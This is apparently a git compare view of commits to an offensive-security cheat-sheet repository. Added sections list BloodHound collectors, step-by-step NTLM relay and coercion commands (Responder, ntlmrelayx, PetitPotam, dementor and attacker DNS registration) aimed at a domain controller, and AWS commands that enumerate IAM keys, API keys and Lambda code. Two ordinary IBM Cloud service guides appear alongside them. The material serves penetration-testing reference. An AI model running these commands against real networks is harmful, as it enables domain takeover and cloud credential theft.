Compare commits

...

5 Commits

Author SHA1 Message Date
Nidhi Shinde ffcb09ddde
Merge c8e78f4c82 into 04842b53a8 2024-10-27 02:37:16 +05:30
Swissky 04842b53a8 WebClient + RustHoundCE 2024-10-26 16:38:15 +02:00
Swissky 26d5c2e432 AWS update 2024-10-24 14:43:52 +02:00
Nidhi Shinde c8e78f4c82
Create ibm-cloud-object-storage.md 2024-10-08 02:45:19 +05:30
Nidhi Shinde 7ffd929ec1
Create ibm-cloud-databases.md 2024-10-08 02:29:56 +05:30
11 changed files with 441 additions and 1640 deletions

View File

@ -2,11 +2,12 @@
## Using BloodHound
Use the correct collector:
Use the appropriate data collector to gather information for **BloodHound** or **BloodHound Community Edition (CE)** across various platforms.
* [BloodHoundAD/AzureHound](https://github.com/BloodHoundAD/AzureHound) for Azure Active Directory
* [BloodHoundAD/SharpHound](https://github.com/BloodHoundAD/SharpHound) for local Active Directory (C# collector)
* [FalconForceTeam/SOAPHound](https://github.com/FalconForceTeam/SOAPHound) for local Active Directory (C# collector using ADWS)
* [g0h4n/RustHound-CE](https://github.com/g0h4n/RustHound-CE) for local Active Directory (Rust collector)
* [NH-RED-TEAM/RustHound](https://github.com/NH-RED-TEAM/RustHound) for local Active Directory (Rust collector)
* [fox-it/BloodHound.py](https://github.com/fox-it/BloodHound.py) for local Active Directory (Python collector)
* [coffeegist/bofhound](https://github.com/coffeegist/bofhound) for local Active Directory (Generate BloodHound compatible JSON from logs written by ldapsearch BOF, pyldapsearch and Brute Ratel's LDAP Sentinel)

View File

@ -245,18 +245,55 @@ secretsdump.py -k -no-pass target.lab.local
* WebClient service
**Enable WebClient**:
WebClient service can be enable on the machine using several techniques:
* Mapping a WebDav server using `net` command : `net use ...`
* Typing anything into the explorer address bar that isn't a local file or directory
* Browsing to a directory or share that has a file with a `.searchConnector-ms` extension located inside.
```xml
<?xml version="1.0" encoding="UTF-8"?>
<searchConnectorDescription xmlns="http://schemas.microsoft.com/windows/2009/searchConnector">
<description>Microsoft Outlook</description>
<isSearchOnlyItem>false</isSearchOnlyItem>
<includeInStartMenuScope>true</includeInStartMenuScope>
<templateInfo>
<folderType>{91475FE5-586B-4EBA-8D75-D17434B8CDF6}</folderType>
</templateInfo>
<simpleLocation>
<url>https://example/</url>
</simpleLocation>
</searchConnectorDescription>
```
**Exploitation**:
* Disable HTTP in Responder: `sudo vi /usr/share/responder/Responder.conf`
* Generate a Windows machine name: `sudo responder -I eth0`, e.g: WIN-UBNW4FI3AP0
* Prepare for RBCD against the DC: `python3 ntlmrelayx.py -t ldaps://dc --delegate-access -smb2support`
* Discover WebDAV services
* Discover machines on the network with enabled WebClient service
```ps1
webclientservicescanner 'domain.local'/'user':'password'@'machine'
netexec smb 'TARGETS' -d 'domain' -u 'user' -p 'password' -M webdav
netexec smb 10.10.10.10 -d 'domain' -u 'user' -p 'password' -M webdav
GetWebDAVStatus.exe 'machine'
```
* Trigger the authentication to relay to our nltmrelayx: `PetitPotam.exe WIN-UBNW4FI3AP0@80/test.txt 10.0.0.4`, the listener host must be specified with the FQDN or full netbios name like `logger.domain.local@80/test.txt`. Specifying the IP results in anonymous auth instead of System.
* Disable HTTP in Responder
```ps1
sudo vi /usr/share/responder/Responder.conf
```
* Generate a Windows machine name, e.g: "WIN-UBNW4FI3AP0"
```ps1
sudo responder -I eth0
```
* Prepare for RBCD against the DC
```ps1
python3 ntlmrelayx.py -t ldaps://dc --delegate-access -smb2support
```
* Trigger the authentication to relay to our nltmrelayx: `PetitPotam.exe WIN-UBNW4FI3AP0@80/test.txt 10.10.10.10`, the listener host must be specified with the FQDN or full netbios name like `logger.domain.local@80/test.txt`. Specifying the IP results in anonymous auth instead of System.
```ps1
# PrinterBug
dementor.py -d "DOMAIN" -u "USER" -p "PASSWORD" "ATTACKER_NETBIOS_NAME@PORT/randomfile.txt" "TARGET_IP"
@ -267,6 +304,7 @@ secretsdump.py -k -no-pass target.lab.local
Petitpotam.py -d "DOMAIN" -u "USER" -p "PASSWORD" "ATTACKER_NETBIOS_NAME@PORT/randomfile.txt" "TARGET_IP"
PetitPotam.exe "ATTACKER_NETBIOS_NAME@PORT/randomfile.txt" "TARGET_IP"
```
* Use the created account to ask for a service ticket:
```ps1
.\Rubeus.exe hash /domain:purple.lab /user:WVLFLLKZ$ /password:'iUAL)l<i$;UzD7W'
@ -275,6 +313,13 @@ secretsdump.py -k -no-pass target.lab.local
# IP of PC1: 10.0.0.4
```
An alternative for the previous exploitation method is to register a **DNS entry** for the attack machine by yourself then trigger the coercion.
```ps1
python3 /opt/krbrelayx/dnstool.py -u lab.lan\\jdoe -p 'P@ssw0rd' -r attacker.lab.lan -a add -d 192.168.1.50 192.168.1.2
python3 /opt/PetitPotam.py -u jdoe -p 'P@ssw0rd' -d lab.lan attacker@80/test 192.168.1.3
```
## Man-in-the-middle RDP connections with pyrdp-mitm

File diff suppressed because it is too large Load Diff

74
docs/cloud/aws/aws-cli.md Normal file
View File

@ -0,0 +1,74 @@
# AWS - CLI
The AWS Command Line Interface (CLI) is a unified tool to manage AWS services from the command line. Using the AWS CLI, you can control multiple AWS services, automate tasks, and manage configurations through profiles.
## Set up AWS CLI
Install AWS CLI and configure it for the first time:
```ps1
aws configure
```
This will prompt for:
* AWS Access Key ID
* AWS Secret Access Key
* Default region name
* Default output format
## Creating Profiles
You can configure multiple profiles in `~/.aws/credentials` and `~/.aws/config`.
* `~/.aws/credentials` (stores credentials)
```ini
[default]
aws_access_key_id = <default-access-key>
aws_secret_access_key = <default-secret-key>
[dev-profile]
aws_access_key_id = <dev-access-key>
aws_secret_access_key = <dev-secret-key>
[prod-profile]
aws_access_key_id = <prod-access-key>
aws_secret_access_key = <prod-secret-key>
```
* `~/.aws/config` (stores region and output settings)
```ini
[default]
region = us-east-1
output = json
[profile dev-profile]
region = us-west-2
output = yaml
[profile prod-profile]
region = eu-west-1
output = json
```
You can also create profiles via the command line:
```ps1
aws configure --profile dev-profile
```
## Using Profiles
When running AWS CLI commands, you can specify which profile to use by adding the `--profile` flag:
```ps1
aws s3 ls --profile dev-profile
```
If no profile is specified, the **default** profile is used.

View File

@ -3,6 +3,18 @@
* [dufflebag](https://labs.bishopfox.com/dufflebag) - Find secrets that are accidentally exposed via Amazon EBS's "public" mode
## Listing Information About EC2
```ps1
aws ec2 describe-instances
aws ec2 describe-instances --region region
aws ec2 describe-instances --instance-ids ID
```
## Copy EC2 using AMI Image
First you need to extract data about the current instances and their AMI/security groups/subnet : `aws ec2 describe-images --region eu-west-1`

View File

@ -1,6 +1,19 @@
# AWS - Identity & Access Management
## AWS - Shadow Admin
## Listing IAM access Keys
```ps1
aws iam list-access-keys
```
### Listing IAM Users and Groups
```ps1
aws iam list-users
aws iam list-groups
```
## Shadow Admin
### Admin equivalent permission
@ -104,7 +117,6 @@
```
## References
* [Cloud Shadow Admin Threat 10 Permissions Protect - CyberArk](https://www.cyberark.com/threat-research-blog/cloud-shadow-admin-threat-10-permissions-protect/)

View File

@ -1,7 +1,21 @@
# AWS - Service - Lambda
# AWS - Service - Lambda & API Gateway
## Extract function's code
## List Lambda Functions
```ps1
aws lambda list-functions
```
### Invoke a Lambda Function
```
aws lambda invoke --function-name name response.json --region region
```
## Extract Function's Code
```powershell
aws lambda list-functions --profile uploadcreds
@ -10,6 +24,37 @@ wget -O lambda-function.zip url-from-previous-query --profile uploadcreds
```
## List API Gateway
```ps1
aws apigateway get-rest-apis
aws apigateway get-rest-api --rest-api-id ID
```
## Listing Information About Endpoints
```ps1
aws apigateway get-resources --rest-api-id ID
aws apigateway get-resource --rest-api-id ID --resource-id ID
aws apigateway get-method --rest-api-id ApiID --resource-id ID --http-method method
```
## Listing API Keys
```ps1
aws apigateway get-api-keys --include-values
```
## Getting Information About A Specific Api Key
```ps1
aws apigateway get-api-key --api-key KEY
```
## References
* [Getting shell and data access in AWS by chaining vulnerabilities - Appsecco - Riyaz Walikar - Aug 29, 2019](https://blog.appsecco.com/getting-shell-and-data-access-in-aws-by-chaining-vulnerabilities-7630fa57c7ed)

View File

@ -5,7 +5,7 @@
:warning: Only working with IMDSv1.
Enabling IMDSv2 : `aws ec2 modify-instance-metadata-options --instance-id <INSTANCE-ID> --profile <AWS_PROFILE> --http-endpoint enabled --http-token required`.
In order to use IMDSv2 you must provide a token.
In order to use **IMDSv2** you must provide a token.
```powershell
export TOKEN=`curl -X PUT -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" "http://169.254.169.254/latest/api/token"`

View File

@ -58,12 +58,13 @@ export AWS_SESSION_TOKEN=FQoGZXIvYXdzE[...]8aOK4QU=
```
## Open S3 Bucket
## Public S3 Bucket
An open S3 bucket refers to an Amazon Simple Storage Service (Amazon S3) bucket that has been configured to allow public access, either intentionally or by mistake. This means that anyone on the internet could potentially access, read, or even modify the data stored in the bucket, depending on the permissions set.
* [http://s3.amazonaws.com/<bucket-name>/](http://s3.amazonaws.com/<bucket-name>/)
* [http://<bucket-name>.s3.amazonaws.com/](http://<bucket-name>.s3.amazonaws.com/)
* [https://<bucket-name>.region.amazonaws.com/<file>>](https://<bucket-name>.region.amazonaws.com/<file>)
AWS S3 buckets name examples: [http://flaws.cloud.s3.amazonaws.com](http://flaws.cloud.s3.amazonaws.com).
@ -107,21 +108,21 @@ aws s3 ls s3://flaws.cloud/ --no-sign-request --region us-west-2
### Copy, Upload and Download Files
* Copy
* **Copy**
```bash
aws s3 cp <source> <target> [--options]
aws s3 cp local.txt s3://bucket-name/remote.txt --acl authenticated-read
aws s3 cp login.html s3://bucket-name --grants read=uri=http://acs.amazonaws.com/groups/global/AllUsers
```
* Upload
* **Upload**
```bash
aws s3 mv <source> <target> [--options]
aws s3 mv test.txt s3://hackerone.files
SUCCESS : "move: ./test.txt to s3://hackerone.files/test.txt"
```
* Download
* **Download**
```bash
aws s3 sync <source> <target> [--options]
aws s3 sync s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/ . --no-sign-request --region us-west-2

View File

@ -0,0 +1,129 @@
# IBM Cloud Managed Database Services
IBM Cloud offers a variety of managed database services that allow organizations to easily deploy, manage, and scale databases without the operational overhead. These services ensure high availability, security, and performance, catering to a wide range of application requirements.
## Supported Database Engines
### 1. PostgreSQL
- **Description**: PostgreSQL is an open-source relational database known for its robustness, extensibility, and SQL compliance. It supports advanced data types and offers features like complex queries, ACID compliance, and full-text search.
- **Key Features**:
- Automated backups and recovery
- High availability with clustering options
- Scale horizontally and vertically with ease
- Support for JSON and unstructured data
- Advanced security features including encryption
- **Use Cases**:
- Web applications
- Data analytics
- Geospatial data applications
- E-commerce platforms
#### Connecting to PostgreSQL
You can connect to a PostgreSQL database using various programming languages. Here's an example in Python using the `psycopg2` library.
```python
import psycopg2
# Establishing a connection to the PostgreSQL database
conn = psycopg2.connect(
dbname="your_database_name",
user="your_username",
password="your_password",
host="your_host",
port="your_port"
)
cursor = conn.cursor()
# Example of a simple query
cursor.execute("SELECT * FROM your_table;")
records = cursor.fetchall()
print(records)
# Closing the connection
cursor.close()
conn.close()
```
### 2. MongoDB
- **Description**: MongoDB is a leading NoSQL database that provides a flexible data model, enabling developers to work with unstructured data and large volumes of data. It uses a document-oriented data model and is designed for scalability and performance.
- **Key Features**:
- Automatic sharding for horizontal scaling
- Built-in replication for high availability
- Rich querying capabilities and indexing options
- Full-text search and aggregation framework
- Flexible schema design
- **Use Cases**:
- Content management systems
- Real-time analytics
- Internet of Things (IoT) applications
- Mobile applications
#### Connecting to MongoDB
You can connect to MongoDB using various programming languages. Here's an example in JavaScript using the mongodb library.
```javascript
const { MongoClient } = require('mongodb');
// Connection URI
const uri = "mongodb://your_username:your_password@your_host:your_port/your_database";
// Create a new MongoClient
const client = new MongoClient(uri);
async function run() {
try {
// Connect to the MongoDB cluster
await client.connect();
// Access the database
const database = client.db('your_database');
const collection = database.collection('your_collection');
// Example of a simple query
const query = { name: "John Doe" };
const user = await collection.findOne(query);
console.log(user);
} finally {
// Ensures that the client will close when you finish/error
await client.close();
}
}
run().catch(console.dir);
```
## Benefits of Using IBM Cloud Managed Database Services
- **Automated Management**: Reduce operational overhead with automated backups, scaling, and updates.
- **High Availability**: Built-in redundancy and failover mechanisms ensure uptime and data availability.
- **Security**: Comprehensive security features protect your data with encryption, access controls, and compliance support.
- **Scalability**: Easily scale your database resources up or down based on application needs.
- **Performance Monitoring**: Built-in monitoring and alerting tools provide insights into database performance and health.
## Getting Started
To begin using IBM Cloud Managed Database services, follow these steps:
1. **Sign Up**: Create an IBM Cloud account [here](https://cloud.ibm.com/registration).
2. **Select Database Service**: Choose the managed database service you need (PostgreSQL, MongoDB, etc.).
3. **Configure Your Database**: Set up your database parameters, including region, storage size, and instance type.
4. **Deploy**: Launch your database instance with a few clicks.
5. **Connect**: Use the provided connection string to connect your applications to the database.
## Conclusion
IBM Cloud's managed database services provide a reliable and efficient way to manage your database needs. With support for leading databases like PostgreSQL and MongoDB, organizations can focus on building innovative applications while leveraging IBM's infrastructure and expertise.
## Additional Resources
- [IBM Cloud Databases Documentation](https://cloud.ibm.com/docs/databases?code=cloud)
- [IBM Cloud PostgreSQL Documentation](https://cloud.ibm.com/docs/databases?code=postgres)
- [IBM Cloud MongoDB Documentation](https://cloud.ibm.com/docs/databases?code=mongo)

View File

@ -0,0 +1,106 @@
# IBM Cloud Object Storage
IBM Cloud Object Storage is a highly scalable, secure, and durable cloud storage service designed for storing and accessing unstructured data like images, videos, backups, and documents. With the ability to scale seamlessly based on the data volume, IBM Cloud Object Storage is ideal for handling large-scale data storage needs, such as archiving, backup, and modern applications like AI and machine learning workloads.
## Key Features
### 1. **Scalability**
- **Dynamic Scaling**: IBM Cloud Object Storage can grow dynamically with your data needs, ensuring you never run out of storage space. Theres no need for pre-provisioning or capacity planning, as it scales automatically based on demand.
- **No Size Limits**: Store an unlimited amount of data, from kilobytes to petabytes, without constraints.
### 2. **High Durability and Availability**
- **Redundancy**: Data is automatically distributed across multiple regions and availability zones to ensure that it remains available and protected, even in the event of failures.
- **99.999999999% Durability (11 nines)**: IBM Cloud Object Storage provides enterprise-grade durability, meaning that your data is safe and recoverable.
### 3. **Flexible Storage Classes**
IBM Cloud Object Storage offers multiple storage classes, allowing you to choose the right balance between performance and cost:
- **Standard**: For frequently accessed data, providing high performance and low latency.
- **Vault**: For infrequently accessed data with lower storage costs.
- **Cold Vault**: For long-term storage of rarely accessed data, such as archives.
- **Smart Tier**: Automatically optimizes storage costs by tiering objects based on access patterns.
### 4. **Secure and Compliant**
- **Encryption**: Data is encrypted at rest and in transit using robust encryption standards.
- **Access Controls**: Fine-grained access policies using IBM Identity and Access Management (IAM) allow you to control who can access your data.
- **Compliance**: Meets a wide range of industry standards and regulatory requirements, including GDPR, HIPAA, and ISO certifications.
### 5. **Cost-Effective**
- **Pay-as-You-Go**: With IBM Cloud Object Storage, you only pay for the storage and features you use, making it cost-effective for a variety of workloads.
- **Data Lifecycle Policies**: Automate data movement between storage classes to optimize costs over time based on data access patterns.
### 6. **Global Accessibility**
- **Multi-Regional Replication**: Distribute your data across multiple regions for greater accessibility and redundancy.
- **Low Latency**: Access your data with minimal latency, no matter where your users or applications are located globally.
### 7. **Integration with IBM Cloud Services**
IBM Cloud Object Storage integrates seamlessly with a wide range of IBM Cloud services, including:
- **IBM Watson AI**: Store and manage data used in AI and machine learning workloads.
- **IBM Cloud Functions**: Use serverless computing to trigger actions when new objects are uploaded.
- **IBM Kubernetes Service**: Persistent storage for containers and microservices applications.
## Use Cases
1. **Backup and Archiving**:
- IBM Cloud Object Storage is ideal for long-term storage of backups and archived data due to its durability and cost-efficient pricing models. Data lifecycle policies automate the movement of less-frequently accessed data to lower-cost storage classes like Vault and Cold Vault.
2. **Content Delivery**:
- Serve media files like images, videos, and documents to global users with minimal latency using IBM Cloud Object Storages multi-regional replication and global accessibility.
3. **Big Data and Analytics**:
- Store large datasets and logs for analytics applications. IBM Cloud Object Storage can handle vast amounts of data, which can be processed using IBM analytics services or machine learning models.
4. **Disaster Recovery**:
- Ensure business continuity by storing critical data redundantly across multiple locations, allowing you to recover from disasters or data loss events.
5. **AI and Machine Learning**:
- Store and manage training datasets for machine learning and AI applications. IBM Cloud Object Storage integrates directly with IBM Watson and other AI services, providing scalable storage for vast datasets.
## Code Example: Uploading and Retrieving Data
Heres an example using Python and the IBM Cloud SDK to upload and retrieve an object from IBM Cloud Object Storage.
### 1. **Installation**:
Install the IBM Cloud Object Storage SDK for Python:
```bash
pip install ibm-cos-sdk
```
### 2. **Uploading an Object**:
```python
import ibm_boto3
from ibm_botocore.client import Config
# Initialize the client
cos = ibm_boto3.client('s3',
ibm_api_key_id='your_api_key',
ibm_service_instance_id='your_service_instance_id',
config=Config(signature_version='oauth'),
endpoint_url='https://s3.us.cloud-object-storage.appdomain.cloud')
# Upload a file
cos.upload_file(Filename='example.txt', Bucket='your_bucket_name', Key='example.txt')
print('File uploaded successfully.')
```
### 3. **Retrieving an Object**:
```python
# Download an object
cos.download_file(Bucket='your_bucket_name', Key='example.txt', Filename='downloaded_example.txt')
print('File downloaded successfully.')
```
### Configuring IBM Cloud Object Storage
To start using IBM Cloud Object Storage, follow these steps:
1. **Sign Up**: Create an IBM Cloud account [here](https://cloud.ibm.com/registration).
2. **Create Object Storage**: In the IBM Cloud console, navigate to **Catalog** > **Storage** > **Object Storage**, and follow the steps to create an instance.
3. **Create Buckets**: After creating an instance, you can create storage containers (buckets) to store your objects. Buckets are where data is logically stored.
4. **Manage Access**: Define access policies using IBM IAM for your Object Storage buckets.
5. **Connect and Use**: Use the provided API keys and endpoints to connect to your Object Storage instance and manage your data.
## Conclusion
IBM Cloud Object Storage offers a highly scalable, durable, and cost-effective storage solution for various types of workloads, from simple backups to complex AI and big data applications. With features like lifecycle management, security, and integration with other IBM Cloud services, its a flexible choice for any organization looking to manage unstructured data efficiently.